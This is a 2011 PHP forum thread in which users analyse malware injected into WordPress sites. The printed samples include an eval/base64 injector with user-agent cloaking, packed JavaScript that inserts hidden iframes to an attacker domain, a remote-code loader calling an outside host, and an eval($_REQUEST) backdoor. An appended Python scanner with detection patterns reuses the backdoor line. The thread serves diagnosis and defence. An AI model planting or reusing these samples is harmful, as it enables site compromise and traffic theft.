PHP Developers Network
http://forums.devnetwork.net/

Wordpress Security Concerns
http://forums.devnetwork.net/viewtopic.php?f=34&t=133145

Author:  Essentially87 [ Mon Nov 28, 2011 9:21 pm ]
Post subject:  Wordpress Security Concerns

Hi all,

Background info:
Overseas developer working for an affiliate program also developed a lot of individual sites tied into said affiliate program for my roommate's current boss. They know they are being stolen from because of decreased revenues and suspicious activity.

They said they hired some former NSA specialist...nonsense. By no means am I proficient in security or PHP itself in this matter, but what we have discovered is encrypted PHP and Javascript that has been injected into the index.php file on several of the sites. This line of code was not there a month ago; verified when current copies are compared to backups.

Any insight or help would be GREATLY appreciated. Below you can find the encoded version and decoded version. Still working on decoding the JScript. My hypothesis is that somehow this former developer programmed in a back door that lets him redirect traffic from their affiliate to his personal affiliate site and collect the profits unbeknownst to the owners of the site. They are also running older insecure versions of WordPress. I have been recommending upgrades for months now, but maybe this information will finally prompt them to act. It's not my job; I'm just doing this for a friend.

Encoded Version
<?php eval(base64_decode('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'));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */


/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */

define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>


Decoded Version
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
        echo("<script type=\"text/javascript\">".base64_decode('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')."</script>");
}

Author:  Essentially87 [ Mon Nov 28, 2011 10:23 pm ]
Post subject:  Re: Wordpress Security Concerns

Decoded Javascript
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,'g’),k[c]);return p}(‘l n=k.r&&s.t.u(“v”)==-1;l o=k.p&&s.t.u(“v”)==-1;l w=’C=0 D=0 E=”0″ F=”0″ G=”0″ H=”0″ I=”0″ J=”K”‘;l c=L M();c[0]=”d://e.f-b.g/m.h?i=j”;c[1]=”d://e.f-b.g/b.h?i=j”;c[2]=”d://e.f-b.g/m.h?i=j”;c[3]=”d://e.f-b.g/b.h?i=j”;c[4]=”d://e.f-b.g/m.h?i=j”;c[5]=”d://e.f-b.g/b.h?i=j”;c[6]=”d://e.f-b.g/m.h?i=j”;c[7]=”d://e.f-b.g/b.h?i=j”;c[8]=”d://e.f-b.g/m.h?i=j”;c[9]=”d://e.f-b.g/b.h?i=j”;x(n||o)k.N(‘<y O=”q” z=”" ‘+w+’></y>’);P A(){x(n||o){l a=k.p?k.p(“q”):k.r.q;a.z=c[B.Q(B.R()*c.S)]}};T.U=A’,57,57,’|||||||||||layer|randomcontent|http|www|lose|de|php|user|242873|document|var|layer2|ie|dom|getElementById|dynstuff|all|navigator|userAgent|indexOf|Opera|iframeprops|if|iframe|src|random_iframe|Math|width|height|marginwidth|marginheight|hspace|vspace|frameborder|scrolling|no|new|Array|write|id|function|floor|random|length|window|onload’.split(‘|’),0,{}))

Author:  McInfo [ Tue Nov 29, 2011 1:37 am ]
Post subject:  Re: Wordpress Security Concerns

The PHP script appears to inject some JavaScript for visitors whose browsers do not match the list of bots. I sent you a PM containing the unobscured JavaScript. It appears to check for the presence of a cookie. If the cookie is not found, it injects a randomly-sized, randomly-positioned (off screen) iframe which links to the attacker's website. It also sets the cookie it was looking for. The cookie contains a random number and expires in one day. It is named "__umtd", which probably is meant to mimic Urchin Tracking Module cookies ("__utm*"), but has the "t" and "m" transposed for unknown reasons.

Author:  Essentially87 [ Wed Nov 30, 2011 1:57 pm ]
Post subject:  Re: Wordpress Security Concerns

Can anyone offer some insight on this additional malicious code I found?

<?php
eval(error_reporting(0);
function nurlget ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) {$out = false;}
curl_close ($ch);
} else {
$out = file_get_contents($url);
}
return (trim($out));
}
$qs = $_SERVER["QUERY_STRING"];
if($qs) echo(nurlget('http://tpvggiiewv.info/index.php?'.$qs));); ?>

=malware

That's not actually the backdoor.

The back door was in a file called "google971ca75712474fb14e9d9959b9e32653.php" which contained simply:

<?php @eval(stripslashes($_REQUEST[asc])); ?>

And that alone, my friend, is the back door that allows the script to be injected into every website on the server.

Author:  McInfo [ Wed Nov 30, 2011 10:28 pm ]
Post subject:  Re: Wordpress Security Concerns

By "offer some insight" do you mean explain what the code does? The first script is supposed to load additional code from a remote site and execute it. As shown, it will fail because the usage of eval() is syntactically incorrect. The second script executes code submitted to it through an HTTP request.
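The thread shows two things a site owner needs to find on their own: an injected `eval(base64_decode(...))` wrapper at the top of index.php (first post), and a one-line `eval($_REQUEST[...])` backdoor dropped as a stray file (the google971ca75712474fb14e9d9959b9e32653.php post). Below is an added example, not code from the thread or from WordPress, of how a defender can do what the first post describes by hand, comparing the live tree against a backup, and additionally decode base64 literals so the wrapper cannot hide what the payload does. It is written in Python because it runs offline over a copy of the web root; the indicator patterns are taken from the thread's own samples, and the sample tree (`build_sample`) is constructed in a temp directory with a harmless placeholder payload standing in for the real injector.

```python
import base64
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators drawn from the thread's samples: eval over base64_decode, eval over
# request-supplied data, error_reporting(0) used to hide failures, and a
# user-agent check used to cloak the injection from crawlers.
INDICATORS = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "eval_request": re.compile(r"eval\s*\(.*\$_(REQUEST|GET|POST|COOKIE)\b", re.I),
    "silenced_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "ua_cloaking": re.compile(r"HTTP_USER_AGENT", re.I),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]")


def scan_source(src: str, depth: int = 0, max_depth: int = 3):
    """Return (indicator, depth) hits for one PHP source string.

    Base64 literals handed to base64_decode are decoded and scanned recursively,
    so hits found inside the payload are reported with depth >= 1."""
    hits = [(name, depth) for name, rx in INDICATORS.items() if rx.search(src)]
    if depth < max_depth:
        for literal in B64_LITERAL.findall(src):
            try:
                inner = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError: not valid base64
                continue
            hits.extend(scan_source(inner, depth + 1, max_depth))
    return hits


def scan_tree(root):
    """Map relative path -> hits for every .php file under root that has any."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


def _sha256_manifest(root):
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_against_backup(current, backup):
    """Files added, removed or changed since the known-good backup copy."""
    cur, bak = _sha256_manifest(current), _sha256_manifest(backup)
    return {
        "added": sorted(set(cur) - set(bak)),
        "removed": sorted(set(bak) - set(cur)),
        "modified": sorted(p for p in set(cur) & set(bak) if cur[p] != bak[p]),
    }


# --- constructed sample tree (not a real site) -------------------------------
CLEAN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
# Constructed stand-in for the decoded injector: same shape (silenced errors,
# user-agent check) but it only emits an HTML comment.
FAKE_PAYLOAD = ("error_reporting(0);\n"
                "$ua = $_SERVER['HTTP_USER_AGENT'];\n"
                "if (strpos(strtolower($ua), 'bot') === false) { echo '<!-- constructed -->'; }\n")
BACKDOOR_NAME = "google971ca75712474fb14e9d9959b9e32653.php"  # file name from the thread
BACKDOOR = "<?php @eval(stripslashes($_REQUEST[asc])); ?>\n"   # one-liner from the thread


def build_sample():
    """Create a backup tree and a tampered current tree in temp directories."""
    backup = Path(tempfile.mkdtemp(prefix="wp-backup-"))
    current = Path(tempfile.mkdtemp(prefix="wp-current-"))
    for root in (backup, current):
        (root / "wp-blog-header.php").write_text("<?php // constructed stub\n")
    (backup / "index.php").write_text(CLEAN_INDEX)
    encoded = base64.b64encode(FAKE_PAYLOAD.encode()).decode()
    (current / "index.php").write_text(
        f"<?php eval(base64_decode('{encoded}'));\n" + CLEAN_INDEX[len("<?php\n"):])
    (current / BACKDOOR_NAME).write_text(BACKDOOR)
    return current, backup


if __name__ == "__main__":
    current, backup = build_sample()
    for path, hits in scan_tree(current).items():
        print(path, hits)
    print(diff_against_backup(current, backup))
```

Run against a real site, point `scan_tree` at a copy of the web root and `diff_against_backup` at that copy plus the last known-good backup; any file that is both "added" and carries an `eval_request` hit is the kind of drop-in backdoor the thread found, and a "modified" index.php with `eval_base64` at depth 0 and `silenced_errors` or `ua_cloaking` at depth 1 matches the injector in the first post. The pattern list is deliberately small and will produce false positives on legitimate plugins that use eval; treat hits as triage leads, not verdicts.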
